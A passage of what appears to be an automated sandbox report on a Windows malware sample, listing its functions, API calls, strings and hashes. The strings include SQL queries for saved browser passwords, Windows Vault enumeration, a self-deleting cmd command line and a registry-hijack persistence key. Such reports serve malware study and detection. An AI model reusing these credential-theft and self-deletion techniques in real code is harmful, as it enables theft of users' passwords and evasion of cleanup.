                                                • RegQueryValueExW.ADVAPI32(0040A729,Path,00000000,?,?,?), ref: 0040C198
                                                • RegCloseKey.ADVAPI32(0040A729), ref: 0040C1A1
                                                Strings
                                                • Path, xrefs: 0040C190
                                                • thunderbird.exe, xrefs: 0040C15A
                                                • Software\Microsoft\Windows\CurrentVersion\App Paths\, xrefs: 0040C14E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseOpenQueryValuelstrcatlstrcpy
                                                • String ID: Path$Software\Microsoft\Windows\CurrentVersion\App Paths\$thunderbird.exe
                                                • API String ID: 3135247354-1374996286
                                                • Opcode ID: 14ae2aa9d270cb3cef50989f465333ec15a1f0aa9fea3b159653792e7dfae7b8
                                                • Instruction ID: 41eefbdd8383489cfa8434fb0dc5161a6aa0513f8406a479b9478fbfa2c9b186
                                                • Opcode Fuzzy Hash: 14ae2aa9d270cb3cef50989f465333ec15a1f0aa9fea3b159653792e7dfae7b8
                                                • Instruction Fuzzy Hash: 7A1152B294010CBFE710ABE5EC89FDA7B7CEB58304F104176B605E2190E6749E448B65
                                                Function 0040C4A8 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 371fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040F79C
                                                  • Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,770113FB,?,?,00413589,?,00411515,00413589,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403365
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5A5
                                                • PathFileExistsW.SHLWAPI(00000000), ref: 0040C5AF
                                                • CopyFileW.KERNEL32 ref: 0040C5C3
                                                • CopyFileW.KERNEL32 ref: 0040C5CF
                                                  • Part of subcall function 0040CED9: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040C66B,?,?,00000000,?), ref: 0040CF43
                                                  • Part of subcall function 0040CED9: LocalFree.KERNEL32(?,00000000,00000000,00000000,00000000,?,0040C66B,?,?,00000000,?), ref: 0040CF4C
                                                  • Part of subcall function 0040CF58: LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?,00000000,?,00000000), ref: 0040CFE0
                                                  • Part of subcall function 0040CF58: BCryptDecrypt.BCRYPT(?,0000000C,?,?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,?,00000000), ref: 0040D00E
                                                  • Part of subcall function 0040CF58: LocalFree.KERNEL32(?), ref: 0040D096
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,770113FB,?,00405A4F,h\HA,00000000), ref: 004033C8
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,?,00405A4F,h\HA,00000000), ref: 004033D5
                                                  • Part of subcall function 004033BF: lstrcpyA.KERNEL32(00000000,?,?,00405A4F,h\HA,00000000), ref: 004033E8
                                                  • Part of subcall function 00403125: lstrcatA.KERNEL32(00000000,770113FB,?,00000000,?,004035C4,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 00403151
                                                  • Part of subcall function 0040308C: lstrlenA.KERNEL32(00000000,004030B4,770113FB,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,770113FB,?,0040350E,00000000,?,00000000), ref: 00403093
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFreeLocal$Pathlstrlen$CopyExistslstrcat$AllocCryptDecryptFolderSpecialVirtuallstrcpy
                                                • String ID: .tmp$select signon_realm, origin_url, username_value, password_value from logins$select signon_realm, origin_url, username_value, password_value from wow_logins
                                                • API String ID: 881303001-3832748974
                                                • Opcode ID: 9bda56d6d69c5f57ec678f3e4c4772a19a6198acc8d5e9c5e4fcd6fb202fad87
                                                • Instruction ID: 0ca802b5a9bdb087f99acbc43c27ec859dc82da18e10b079d0d2d3710b2b7a92
                                                • Opcode Fuzzy Hash: 9bda56d6d69c5f57ec678f3e4c4772a19a6198acc8d5e9c5e4fcd6fb202fad87
                                                • Instruction Fuzzy Hash: CDD12A72900109ABDB15EFA5DC92AEEBB79AF44305F10453FF502B61D1DF38AA05CB68
                                                Function 00402961 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 108processthreadCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410F31: RegDeleteKeyW.ADVAPI32(80000001,?), ref: 00410F38
                                                • TerminateThread.KERNEL32(00000000,?,?), ref: 00411740
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 004117AD
                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00411837
                                                • CloseHandle.KERNEL32(?), ref: 00411846
                                                • CloseHandle.KERNEL32(?), ref: 0041184B
                                                • ExitProcess.KERNEL32 ref: 0041184E
                                                Strings
                                                • cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q , xrefs: 004117BB
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleProcess$CreateDeleteExitFileModuleNameTerminateThread
                                                • String ID: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                                                • API String ID: 3630425516-84290196
                                                • Opcode ID: dbffefe1e76a3bff9f32270f37ff2b80be992a136857cb3aff05e084026e593e
                                                • Instruction ID: 0669df4c0b48276121317c389eaf51d9506befaeb36db9ccd3a74da0e324114f
                                                • Opcode Fuzzy Hash: dbffefe1e76a3bff9f32270f37ff2b80be992a136857cb3aff05e084026e593e
                                                • Instruction Fuzzy Hash: 763163B2900618FFDB11EBE1CD86EDF777DEB44304F004466B205A6191DB78AE84CBA5
                                                Function 0040B559 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 54libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(vaultcli.dll), ref: 0040B561
                                                  • Part of subcall function 00410969: lstrcmpA.KERNEL32(?,00411BD0,?,open,00411BD0), ref: 004109A2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoadlstrcmp
                                                • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                • API String ID: 2493137890-3967309459
                                                • Opcode ID: 2e1becb0e22d0901784ec97af29de78ef9547c4b10e4be9d9b71d33a11f5ef50
                                                • Instruction ID: 4d5c9ce57fc80413d8924e0d9da559f7b8b65f17eb8cfa66c918fcdc930158bd
                                                • Opcode Fuzzy Hash: 2e1becb0e22d0901784ec97af29de78ef9547c4b10e4be9d9b71d33a11f5ef50
                                                • Instruction Fuzzy Hash: D511FB70A11B00CFE724AB72A415BE7B6E5EB84301F14893F949A97381DB78A881CB4C
                                                Function 004119C9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 49registrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.ADVAPI32 ref: 004119E9
                                                • RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00411A06
                                                • lstrlenW.KERNEL32(0054CBF0,?,?,?,?,00411A78,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A12
                                                • RegSetValueExW.ADVAPI32 ref: 00411A28
                                                • RegCloseKey.ADVAPI32(?), ref: 00411A31
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateOpenValuelstrlen
                                                • String ID: Install$SOFTWARE\_rptls
                                                • API String ID: 2036214137-3226779556
                                                • Opcode ID: 1448b5389596f841856a15a763dfb7c9bcc182f59020e913fb266beac556abf6
                                                • Instruction ID: 394209d5bc156890c72a6297613c1ccbf6f88d34747de2c12624768b323793dd
                                                • Opcode Fuzzy Hash: 1448b5389596f841856a15a763dfb7c9bcc182f59020e913fb266beac556abf6
                                                • Instruction Fuzzy Hash: AEF04F72500058BFE7205797EC4DEEB7FBCEBC6791B1040B9BA05E2121D6715E40C6B4
                                                Function 00411A3C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameW.KERNEL32(00000000,0054CBF0,00000208,00000000,00000000,?,?,?,004057B9,?,00000000,00000000), ref: 00411A58
                                                • IsUserAnAdmin.SHELL32 ref: 00411A5E
                                                  • Part of subcall function 0040FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,770113FB,00000000,770113FB,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
                                                  • Part of subcall function 0040FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
                                                  • Part of subcall function 0040FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
                                                  • Part of subcall function 0040FBFC: CloseHandle.KERNEL32(00000000), ref: 0040FC48
                                                  • Part of subcall function 004119C9: RegOpenKeyExW.ADVAPI32 ref: 004119E9
                                                  • Part of subcall function 004119C9: RegCreateKeyExW.ADVAPI32(80000001,SOFTWARE\_rptls,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00411A06
                                                  • Part of subcall function 004119C9: lstrlenW.KERNEL32(0054CBF0,?,?,?,?,00411A78,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A12
                                                  • Part of subcall function 004119C9: RegSetValueExW.ADVAPI32 ref: 00411A28
                                                  • Part of subcall function 004119C9: RegCloseKey.ADVAPI32(?), ref: 00411A31
                                                • FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A87
                                                • LoadResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A91
                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A9B
                                                • LockResource.KERNEL32(00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00411AA2
                                                  • Part of subcall function 00411936: VirtualProtect.KERNEL32(00000000,000007D0,00000040,00000000,00000000,00000000,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000), ref: 00411974
                                                  • Part of subcall function 00411936: VirtualAlloc.KERNEL32(00000000,000001FE,00001000,00000040,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411988
                                                  • Part of subcall function 00411936: GetWindowsDirectoryW.KERNEL32(00000000,00000104,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 00411996
                                                  • Part of subcall function 00411936: lstrlenW.KERNEL32(00000000,\System32\cmd.exe,00000028,?,00000000,?,00411AB4,?,?,?,004057B9,?,00000000,00000000), ref: 004119A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Resource$CloseOpenProcessTokenVirtuallstrlen$AdminAllocCreateCurrentDirectoryFileFindHandleInformationLoadLockModuleNameProtectSizeofUserValueWindows
                                                • String ID: WM_DSP
                                                • API String ID: 1403607128-506093727
                                                • Opcode ID: 7ef6ad4fe4161bfe5cb5d74be513fcbe20b09fd61d8dde34b9c40d3575c04885
                                                • Instruction ID: ff14ec2d81de0f128fb18523e9c8342e2cb5d54092beee342a8992e6e9539887
                                                • Opcode Fuzzy Hash: 7ef6ad4fe4161bfe5cb5d74be513fcbe20b09fd61d8dde34b9c40d3575c04885
                                                • Instruction Fuzzy Hash: BEF062716412907BD72037B3AC0DFDB2DACAFD2754F154436F606D62A1EA2888C1C26C
                                                Function 00411855 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38registrystringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(00411B3D,00416056,?,?,00411B3D,00416056,?), ref: 0041185D
                                                • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?), ref: 0041187A
                                                • SetLastError.KERNEL32(00000000,?,?,00411B3D,00416056,?), ref: 00411885
                                                • RegSetValueExA.ADVAPI32(?,V`A,00000000,00000001,00411B3D,00000000), ref: 0041189D
                                                • RegCloseKey.ADVAPI32(?), ref: 004118A8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseErrorLastOpenValuelstrlen
                                                • String ID: Software\Classes\Folder\shell\open\command$V`A
                                                • API String ID: 1613093083-1166067495
                                                • Opcode ID: a382cb47b3b6cbe431fb1ceec69794051c22e485614749e84a556bed88be12ff
                                                • Instruction ID: 67f62c0d9d2396e2191d3c91f8353b719c1e7652dea8d9ddf4f1049f89fea6f7
                                                • Opcode Fuzzy Hash: a382cb47b3b6cbe431fb1ceec69794051c22e485614749e84a556bed88be12ff
                                                • Instruction Fuzzy Hash: DFF09075540214FBDF212FA1EC09FDA3F69EF08790F108161FB01B61A0D6758A80ABAC
                                                Function 00405CA3 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 20libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00405CAB
                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA,?,?,?,?,?,?,?,?,?,?,00405A5F,?,00000000,h\HA), ref: 00405CB7
                                                • ExitProcess.KERNEL32 ref: 00405CDB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressExitLibraryLoadProcProcess
                                                • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                                • API String ID: 881411216-1361702557
                                                • Opcode ID: b0587a7c36b41e7ed90a540dbc2d2eeb4f414d39a4cdcd411ecec0db7ec4c180
                                                • Instruction ID: f6ea2254eaf30196fa9925607221d9885049cc43d4f14e8b8c3ed5d004ce2483
                                                • Opcode Fuzzy Hash: b0587a7c36b41e7ed90a540dbc2d2eeb4f414d39a4cdcd411ecec0db7ec4c180
                                                • Instruction Fuzzy Hash: E9D05EB87C13417AEA1037B22C1EFE63A08ABD5F56F344032B641E61C1D6BA84C5C92C
                                                Function 00405F6A Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 14libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00405F6F
                                                • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405F7B
                                                • ExitProcess.KERNEL32 ref: 00405F9A
                                                Strings
                                                • USER32.DLL, xrefs: 00405F6A
                                                • MessageBoxA, xrefs: 00405F75
                                                • PureCall, xrefs: 00405F8A
                                                • A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application, xrefs: 00405F8F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressExitLibraryLoadProcProcess
                                                • String ID: A pure virtual function was called. This is a fatal error, and indicates a serious error in the implementation of the application$MessageBoxA$PureCall$USER32.DLL
                                                • API String ID: 881411216-4134947204
                                                • Opcode ID: 6e7589d790c6cf012da0c54c36493ee311179fd54065888ec551368c93e5afcc
                                                • Instruction ID: efc4633c8a652a303dac688b9d7a4e369dd6935e82649a3b92a00aa0e7b9a61a
                                                • Opcode Fuzzy Hash: 6e7589d790c6cf012da0c54c36493ee311179fd54065888ec551368c93e5afcc
                                                • Instruction Fuzzy Hash: 45D0C9B83C03417EE64037F26C0EFD92915ABD5F46F2044327605E40D1CAE890C1852D
                                                Function 00410D24 Relevance: 12.2, APIs: 8, Instructions: 164processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00410D6A
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00410D83
                                                • CloseHandle.KERNEL32(00000000), ref: 00410D8E
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                • OpenProcess.KERNEL32(00001410,00000000,?,?), ref: 00410DF8
                                                • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00410E2E
                                                • CloseHandle.KERNEL32(00000000), ref: 00410E81
                                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00410EE5
                                                • CloseHandle.KERNEL32(00000000), ref: 00410EF7
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandle$Process32lstrcpylstrlen$CreateFileFirstFreeModuleNameNextOpenProcessSnapshotToolhelp32Virtual
                                                • String ID:
                                                • API String ID: 3514491001-0
                                                • Opcode ID: 9642cccdab3ed3a665e64c5ba10acdf12f377285dff3872642944f15cd5b8115
                                                • Instruction ID: 9a7a2f070f2fca196465514d4b0992d0753fe5cef1253bc48716d49042ca90ac
                                                • Opcode Fuzzy Hash: 9642cccdab3ed3a665e64c5ba10acdf12f377285dff3872642944f15cd5b8115
                                                • Instruction Fuzzy Hash: C051A472D00119ABDB10EBA1CC49AEEBB78AF54715F01057AF405B72D0EB789BC5CB58
                                                Function 0040EF4F Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 192COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv
                                                • String ID: <5Ik
                                                • API String ID: 1507349165-1120072674
                                                • Opcode ID: 652383c68e6777e97a8fac4902e81169f0e49f1b82f2e07fecaefc520bdac26f
                                                • Instruction ID: 8bfb0107b98e526b9d1a9dae25d4f998368fd487d5b7f1cb445ba2dcd1ca822d
                                                • Opcode Fuzzy Hash: 652383c68e6777e97a8fac4902e81169f0e49f1b82f2e07fecaefc520bdac26f
                                                • Instruction Fuzzy Hash: 7361E871904219AADB10CF95CC45BEEB7B9BF05304F00807AF944BB2C1D7B9694ACBA9
                                                Function 00412D0A Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 168comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 00412D1A
                                                • CoCreateInstance.OLE32(004145A0,00000000,00000001,00417410,?), ref: 00412D32
                                                • CoCreateInstance.OLE32(004145F0,00000000,00000001,00417400,?), ref: 00412D8C
                                                  • Part of subcall function 00412A6B: CoCreateInstance.OLE32(004145E0,00000000,00000001,004173F0,?), ref: 00412A99
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInstance$Initialize
                                                • String ID: Grabber$Source$vids
                                                • API String ID: 1108742289-4200688928
                                                • Opcode ID: 2d7e20f5e0ec2c28e7b84c0d761a849653f55684f2d652d219b777fb8497efb2
                                                • Instruction ID: 63471f18b460f53cd423bd4c8f0a7cd860ec001c52772ce011214a511ca997dc
                                                • Opcode Fuzzy Hash: 2d7e20f5e0ec2c28e7b84c0d761a849653f55684f2d652d219b777fb8497efb2
                                                • Instruction Fuzzy Hash: A9518F71600205AFCB14DFA4C885FDA3B75AF89704B24445DFD15AF291CBBAE891CBA4
                                                Function 00402CEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 107stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040F80E: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040F825
                                                  • Part of subcall function 0040F80E: CoInitialize.OLE32(00000000), ref: 0040F82C
                                                  • Part of subcall function 0040F80E: CoCreateInstance.OLE32(00414490,00000000,00000017,00416E60,?), ref: 0040F84A
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402D1B
                                                  • Part of subcall function 00411E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00411E4E
                                                  • Part of subcall function 00411E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
                                                  • Part of subcall function 00411E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00411E72
                                                  • Part of subcall function 00411E21: CloseHandle.KERNEL32(00000000), ref: 00411E7F
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 0040FA1F: GlobalMemoryStatusEx.KERNEL32(?), ref: 0040FA30
                                                  • Part of subcall function 0040FC7E: GetComputerNameW.KERNEL32(00402D7F,00000010), ref: 0040FCA1
                                                  • Part of subcall function 0040FC58: GetCurrentProcess.KERNEL32(?,?,00402D84,?,00414648,?,?,00000000,?,?,?), ref: 0040FC5C
                                                  • Part of subcall function 0040FBFC: GetCurrentProcess.KERNEL32(00000008,00000000,770113FB,00000000,770113FB,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
                                                  • Part of subcall function 0040FBFC: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
                                                  • Part of subcall function 0040FBFC: GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
                                                  • Part of subcall function 0040FBFC: CloseHandle.KERNEL32(00000000), ref: 0040FC48
                                                  • Part of subcall function 0040FA42: LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040FA5A
                                                  • Part of subcall function 0040FA42: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040FA6A
                                                  • Part of subcall function 0040FCB8: RegOpenKeyExW.ADVAPI32 ref: 0040FCFC
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00402DDF
                                                • lstrcatW.KERNEL32(?,\Microsoft Vision\,?,?), ref: 00402DF1
                                                • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00402DFF
                                                  • Part of subcall function 0040990A: InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409916
                                                  • Part of subcall function 0040990A: DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 0040992D
                                                  • Part of subcall function 0040990A: EnterCriticalSection.KERNEL32(0054DB10,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409939
                                                  • Part of subcall function 0040990A: GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402E0D,?,00000001,?,?), ref: 00409949
                                                  • Part of subcall function 0040990A: LeaveCriticalSection.KERNEL32(0054DB10,?,00000000), ref: 0040999C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalFileSection$CreateHandleInitializeProcess$CloseCurrentModuleNameOpenTokenlstrlen$AddressComputerDeleteDirectoryEnterFolderGlobalInformationInstanceLeaveLibraryLoadMemoryPathProcReadSecuritySizeStatuslstrcatlstrcpy
                                                • String ID: E%@$\Microsoft Vision\
                                                • API String ID: 1987359387-3463944462
                                                • Opcode ID: 0bb32fca0e1cec9c810d30c46f0d28e8f140ea334447f87a062002849f56b118
                                                • Instruction ID: b073199de962c33f14e286e13f1a431593480788bd2903fd1a4d69c6a0139752
                                                • Opcode Fuzzy Hash: 0bb32fca0e1cec9c810d30c46f0d28e8f140ea334447f87a062002849f56b118
                                                • Instruction Fuzzy Hash: F531A5B1A001187BDB14FBA1DC46DEF7B7CAF84308F00447EB505B25D1DA786B858BA8
                                                Function 0040EE9A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000006), ref: 0040EEB4
                                                • gethostbyname.WS2_32(?), ref: 0040EEBD
                                                • htons.WS2_32(?), ref: 0040EEE1
                                                • InetNtopW.WS2_32(00000002,?,?,00000802), ref: 0040EF12
                                                • connect.WS2_32(00000000,?,00000010), ref: 0040EF2B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InetNtopconnectgethostbynamehtonssocket
                                                • String ID: <5Ik
                                                • API String ID: 2393792429-1120072674
                                                • Opcode ID: cdb34d5c5418b94e03a5ce5b980ec685bf23eacec3b5f4675f66b9c6347cb78a
                                                • Instruction ID: 731c1f41b349be9d14ca138489269ada96d1ed04eb47d8ef03f8d9d6417251f1
                                                • Opcode Fuzzy Hash: cdb34d5c5418b94e03a5ce5b980ec685bf23eacec3b5f4675f66b9c6347cb78a
                                                • Instruction Fuzzy Hash: BC1122B2900258BFE71097A4AC0AFFB3BACEF45720F00847AF955D71D1D6B48D4487A4
                                                Function 00407948 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64sleepprocessmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 0040796B
                                                • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00407979
                                                • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00407987
                                                • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004079C1
                                                • Sleep.KERNEL32(000003E8), ref: 004079D0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
